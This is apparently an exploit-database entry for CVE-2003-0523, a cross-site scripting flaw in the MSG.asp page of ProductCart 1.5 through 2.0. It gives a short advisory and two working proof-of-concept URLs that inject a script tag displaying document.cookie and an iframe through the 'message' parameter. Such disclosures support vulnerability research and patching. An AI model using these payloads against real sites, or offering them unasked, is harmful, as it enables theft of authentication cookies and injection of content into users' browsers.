ProductCart 1.5/1.6/2.0 - 'MSG.asp' Cross-Site Scripting
Author: atomix
type: webapps
platform: asp
port:
date_added: 2003-07-05
date_updated: 2012-11-21
verified: 1
codes: CVE-2003-0523;OSVDB-2280
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8108/info
A cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values.
Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.
http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>
http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>